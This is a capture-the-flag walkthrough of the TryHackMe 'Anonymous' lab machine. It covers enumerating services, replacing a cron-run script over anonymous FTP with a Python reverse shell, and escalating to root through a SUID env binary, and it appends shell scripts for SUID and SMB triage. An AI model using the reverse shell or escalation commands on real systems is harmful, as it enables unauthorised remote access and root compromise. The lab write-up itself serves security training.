TryHackMe: Anonymous Walkthrough
Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
First, let’s start with an Nmap scan to identify service versions (-sV), run the default enumeration scripts (-sC) and save the output to a file (-oN):
nmap -sV -sC -oN version-scan 10.10.199.86
So we have the following services open: FTP on port 21 with anonymous login allowed, SSH on port 22 and SMB on ports 139/445.
This is a bit confusing, as in one place Nmap is saying it’s a Windows machine and in another a Linux Ubuntu machine. The SMB OS detection shows Windows 6.1 (Samba 4.7.6 — Ubuntu): Samba advertises a Windows-compatible OS version to clients, and that is what Nmap’s smb-os-discovery script reports. My initial assumption is that this is a Linux machine and the Samba server is confusing Nmap.
Anyway, let’s start with the FTP server.
FTP Port 21:
As we know from the Nmap scan, the FTP service allows us to log in as anonymous, so for the name just type in ‘anonymous’ and hit return at the password prompt. Let’s see what is on the FTP server:
Let’s download all the files from the /scripts directory for further enumeration using the ‘mget’ command (turn off interactive mode with ‘prompt off’ first so mget does not ask for confirmation on every file).
The one that I am very interested in is the clean.sh file:
This is clearly being run as a cron job, as we can see its output accumulating in ‘removed_files.log’. If that is the case, and the /scripts directory is writable over the anonymous FTP login, we can simply replace this file with a reverse shell that connects back to a listener and wait for cron to run it. To do this I will use a Python reverse shell and connect back to a Pwncat listener.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I removed the clean.sh file and created a new one using vi, adding the shell code with my IP address and the port to listen on (4444). I then uploaded this to the FTP server using ‘put clean.sh clean.sh’, making sure that I launched the FTP client from the same directory in which I had created the new clean.sh file. I then launched the Pwncat listener and waited for the cron job to execute clean.sh.
We can now grab the user.txt file and move on to privilege escalation. Before uploading any further enumeration scripts, I will use Pwncat’s internal enumeration to start with. To do this, enter the local Pwncat prompt using Ctrl-D and type ‘privesc -l’:
Straight away we see a binary called env owned by root with the SUID bit set. We can probably exploit this to get a shell as root, as the enumeration output above suggests. Let’s take a look at env on GTFOBins:
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions…
As we cannot use sudo, we need to try the SUID option:
The env binary is located in /usr/bin, so we apply the above to that path. The -p flag matters: without it the shell drops the effective UID back to our real UID on startup and we lose root.
/usr/bin/env /bin/sh -p
Ignore all the strange text, as this appears to be a glitch with Pwncat; we have our result, and running ‘id’ should confirm euid=0(root). Navigating to /root we can grab root.txt.
With this box, SMB appeared to be a rabbit hole, although I enumerated it as below:
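The SUID triage that Pwncat’s ‘privesc -l’ did for the author, written out as a small script; this is an added example and not part of the original walkthrough or of Pwncat. The KNOWN list is a short constructed subset of binaries that have a GTFOBins SUID entry, not the full catalogue, and the exploit function is the same GTFOBins env technique used above.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: find root-owned SUID
# binaries (what Pwncat's `privesc -l` surfaced for the author) and flag the
# ones that have a known GTFOBins SUID technique. KNOWN is a short constructed
# subset of that list, not the full catalogue; env is the one that matters here.

KNOWN="env bash sh dash python python2 python3 perl ruby find vim vi nano less more awk gawk cp mv tee"

# Read paths (one per line) on stdin and print "FLAG <path>" for known
# escalation candidates, "OK   <path>" for everything else.
flag_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $KNOWN " in
            *" $name "*) printf 'FLAG %s\n' "$path" ;;
            *)           printf 'OK   %s\n' "$path" ;;
        esac
    done
}

# Count the candidates in a list on stdin; a quick "is anything here?" check.
count_flagged() {
    flag_suid | grep -c '^FLAG ' || true
}

# Enumerate root-owned SUID files on the live system and triage them.
scan_suid() {
    find / -user root -perm -4000 -type f 2>/dev/null | flag_suid
}

# GTFOBins SUID entry for env: exec a shell with -p so it does not drop the
# effective UID back to our real UID. Confirm with `id` (expect euid=0(root)).
exploit_env() {
    /usr/bin/env /bin/sh -p
}

# Usage: ./suid-triage.sh scan   |   ./suid-triage.sh env
if [ "$1" = "scan" ]; then
    scan_suid
elif [ "$1" = "env" ]; then
    exploit_env
fi
```

Expected SUID binaries such as passwd, su and sudo come back as OK because the list is about binaries with a documented shell-spawning technique, not about every SUID file; treat anything flagged as a lead to check against GTFOBins by hand before running it.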
SMB (Samba) Port 139/445:
A quick smbmap scan showed us that we had read access to the pics share.
Using smbclient we can access this pics share, where there are two photos of cute dogs.
Downloading the two photos, I started to check for any steganography that may offer further information. To start, I ran both files through strings, Exiftool, steghide and stegcracker, but could not find any further information. With the box rooted, I decided to end it here.
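The SMB enumeration and the first-pass checks on the downloaded pictures, scripted as an added example that is not part of the original walkthrough. The share name pics comes from the page; the output directory, the anonymous login to smbmap/smbclient, and the use of an empty steghide passphrase are assumptions. extract_strings is a portable stand-in for the binutils strings command so the triage still runs where strings is not installed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: pull the pics share
# anonymously and run the first-pass checks the author describes (strings,
# exiftool, steghide). Assumptions: smbmap and smbclient are installed for the
# network steps; exiftool and steghide are used only if present.
# extract_strings is a portable stand-in for the binutils `strings` command.

# Printable runs of 8 or more characters, one per line (like `strings -n 8`).
extract_strings() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{8,}$'
}

# List shares and our access level using the anonymous login.
smb_list() {
    smbmap -H "$1" -u anonymous -p ''
}

# Recursively download SHARE from HOST into OUTDIR without a prompt per file.
smb_pull() {
    host="$1"; share="$2"; outdir="$3"
    mkdir -p "$outdir"
    ( cd "$outdir" && smbclient -N "//$host/$share" -c 'prompt off; recurse on; mget *' )
}

# First-pass triage of one downloaded file.
triage_file() {
    f="$1"
    echo "== $f: printable strings (8+ chars)"
    extract_strings "$f" || echo "(none)"
    if command -v exiftool >/dev/null 2>&1; then
        echo "== $f: metadata"
        exiftool "$f"
    fi
    if command -v steghide >/dev/null 2>&1; then
        echo "== $f: steghide extract with empty passphrase"
        steghide extract -sf "$f" -p '' -f || echo "(nothing extracted; try stegcracker with a wordlist)"
    fi
}

main() {
    host="$1"; share="${2:-pics}"; outdir="${3:-./loot}"
    smb_list "$host"
    smb_pull "$host" "$share" "$outdir"
    for f in "$outdir"/*; do
        [ -f "$f" ] && triage_file "$f"
    done
}

# Usage: ./smb-triage.sh <host> [share] [outdir]
if [ "$#" -ge 1 ]; then
    main "$@"
fi
```

On this box the triage finds nothing, which matches the author’s conclusion that the share is a rabbit hole; the value of scripting it is that the same three checks run identically on every file from every share, so a real finding is not missed because one image was skipped by hand.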
A big thank you to the namelessone for creating this fun box.